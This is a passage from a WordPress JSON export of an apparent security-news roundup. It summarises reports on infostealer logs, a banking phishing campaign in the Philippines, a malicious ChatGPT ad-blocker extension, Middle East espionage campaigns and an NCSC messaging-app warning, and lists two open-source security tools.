href=\"https:\/\/flare.io\/learn\/resources\/blog\/victim-profiling-stealer-malware\">shows<\/a> that a single stealer log can be devastating, with individual logs containing up to 1,381 pieces of personally identifiable information. In&nbsp;an analysis published by Whiteintel last month, the company found that a single careless download of cracked software by one employee can hand criminal groups direct access to an entire corporate network in under two days. &#8220;An employee downloads cracked software on Tuesday afternoon,&#8221; it <a href=\"https:\/\/whiteintel.io\/blog\/infostealer-lifecycle-48-hours\">said<\/a>. &#8220;By Thursday morning, their credentials are listed on the Russian Market for $15. Corporate VPN access, AWS credentials, session tokens that bypass MFA &#8211; all packaged and ready for purchase.&#8221;<\/li>\n<li><strong>Phishing Campaign Targets Philippine Banking Users <\/strong>&#8212;An ongoing phishing campaign targeting major banks in the Philippines is using email phishing via compromised accounts as the initial vector to harvest online banking credentials and one-time passwords (OTPs) for financial fraud. According to Group-IB, the campaign began in early 2024, distributing over 900 malicious links as part of the coordinated scheme. Clicking on the link embedded in the email message triggers a redirection chain that uses trusted services like Google Business, AMP CDN, Cloudflare Workers, and URL shorteners before taking the victims to the final landing page. &#8220;The campaign enables real-time financial fraud by bypassing MFA mechanisms through the theft of valid One-Time Passwords (OTP), allowing attackers to perform unauthorized fund transfers,&#8221; the company <a href=\"https:\/\/www.group-ib.com\/blog\/phisles-phishing-banks-philippines\/\">said<\/a>. &#8220;Telegram bots were used as exfiltration channels, enabling threat actors to automatically collect victims&#8217; login information in real time.&#8221; The activity has been attributed to a threat group called PHISLES.<\/li>\n<li><strong>Chrome Extensions Harvests ChatGPT Conversations <\/strong>&#8212;A malicious Chrome extension, named &#8220;ChatGPT Ad Blocker&#8221; (ID: ipmmidjikiklckbngllogmggoofbhjikgb), found on the Chrome Web Store masquerades as an ad-blocking tool for the AI chatbot, but contains functionality to &#8220;steal the user&#8217;s ChatGPT conversations data by systematically copying the HTML page and sending to it to a webhook on a private Discord channel,&#8221; DomainTools <a href=\"https:\/\/dti.domaintools.com\/securitysnacks\/securitysnack-openai-anti-ads-malware\">said<\/a>.<\/li>\n<li><strong>Iran Conflict Triggers Espionage Activity in Middle East <\/strong>&#8212;In the aftermath of the U.S.-Israel-Iran conflict, Proofpoint <a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targets\">said<\/a> it has recorded an increase in campaigns from state-sponsored threat actors likely affiliated with China (UNK_InnerAmbush, which uses phishing emails to deliver <a href=\"https:\/\/www.pointwild.com\/threat-intelligence\/cobalt-strike-overview\">Cobalt Strike<\/a> payload), Belarus (<a href=\"https:\/\/thehackernews.com\/2023\/03\/winter-vivern-apt-targets-european.html\">TA473<\/a>, which has used HTML attachments in emails for reconnaissance), Pakistan (UNK_RobotDreams, which has sent spear-phishing emails to India-based offices of Middle East government entities to deliver a <a href=\"https:\/\/thehackernews.com\/2026\/03\/transparent-tribe-uses-ai-to-mass.html\">Rust backdoor<\/a>), and Hamas (<a href=\"https:\/\/thehackernews.com\/2023\/11\/new-campaign-targets-middle-east.html\">TA402<\/a>, which has used compromised Iraq government email addresses to conduct Microsoft account credential harvesting) targeting Middle East government organizations. The&nbsp;enterprise security company said it also identified the Charming Kitten actor targeting a think tank in the U.S. to&nbsp;trick recipients into entering their Microsoft account credentials. One&nbsp;activity cluster that remains unattributed is UNK_NightOwl. The&nbsp;email messages include a domain that spoofed Microsoft OneDrive, leading the victim to a credential harvesting page. If&nbsp;the user enters credentials and clicks the sign-in button, the target is redirected to &#8220;hxxps:\/\/iran.liveuamap[.]com\/,&#8221; a legitimate open-source platform called Liveuamap with news updates on the Middle East conflict.<\/li>\n<li><strong>U.K. Warns&nbsp;of Messaging App Targeting <\/strong>&#8212;The U.K. National Cyber Security Centre (NCSC) became the latest cybersecurity agency to warn of <a href=\"https:\/\/www.ncsc.gov.uk\/news\/ncsc-warns-of-messaging-app-targeting\">malicious activity<\/a> from messaging apps like WhatsApp, Messenger, and Signal, where threat actors could trick high-risk individuals into <a href=\"https:\/\/thehackernews.com\/2026\/03\/fbi-warns-russian-hackers-target-signal.html\">sharing their login or account recovery codes<\/a>, or linking an attacker-controlled device under their accounts.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd27 Cybersecurity&nbsp;Tools<\/strong><\/h2>\n<ul>\n<li><a href=\"https:\/\/github.com\/step-security\/dev-machine-guard\">Dev Machine Guard<\/a> &#8594; It is an open-source script that scans a developer machine to list installed tools and detect security risks across IDEs, AI agents, extensions, and configurations, without accessing source code or secrets, helping expose gaps traditional tools miss in developer environments.<\/li>\n<li><a href=\"https:\/\/github.com\/praetorian-inc\/pius\">Pius<\/a> &#8594; It is an open-source tool that maps a company&#8217;s external attack surface by discovering and cataloging internet-facing assets, helping security teams identify exposure and reconnaissance risks that could be targeted by attackers.<\/li>\n<\/ul>\n<p><em>Disclaimer: For research and educational use only. Not&nbsp;security-audited. Review&nbsp;all code before use, test in isolated environments, and ensure compliance with applicable&nbsp;laws.<\/em><\/p>\n<h2 style=\"text-align: left;\"><strong>Conclusion<\/strong><\/h2>\n<p>The lesson is simple. Small&nbsp;things matter. Most&nbsp;issues now start from normal parts of the system, not big, obvious&nbsp;gaps.<\/p>\n<p>Don&#8217;t trust anything just because it looks routine. Updates, tools, and background systems can all&nbsp;be used in the wrong&nbsp;way. If&nbsp;it seems low risk, check it again. That&#8217;s where the problems are starting&nbsp;now.<\/p>\n<div><\/div>\n<div>Found this article interesting?  Follow us on <a href='https:\/\/news.google.com\/publications\/CAAqLQgKIidDQklTRndnTWFoTUtFWFJvWldoaFkydGxjbTVsZDNNdVkyOXRLQUFQAQ' rel='noopener' target='_blank'>Google News<\/a>, <a href='https:\/\/twitter.com\/thehackersnews' rel='noopener' target='_blank'>Twitter<\/a> and <a href='https:\/\/www.linkedin.com\/company\/thehackernews\/' rel='noopener' target='_blank'>LinkedIn<\/a> to read more exclusive content we post.<\/div>\n","protected":false},"excerpt":{"rendered":"<p>This&nbsp;week had real hits. The&nbsp;key software got tampered with. Active&nbsp;bugs showed up in the tools people use every day. Some&nbsp;attacks didn&#8217;t even need much effort because the path was already&nbsp;there.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-45160","post","type-post","status-publish","format-standard","hentry","category-thehackernews"],"_links":{"self":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts\/45160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/comments?post=45160"}],"version-history":[{"count":0,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/posts\/45160\/revisions"}],"wp:attachment":[{"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/media?parent=45160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/categories?post=45160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/wp-json\/wp\/v2\/tags?post=45160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}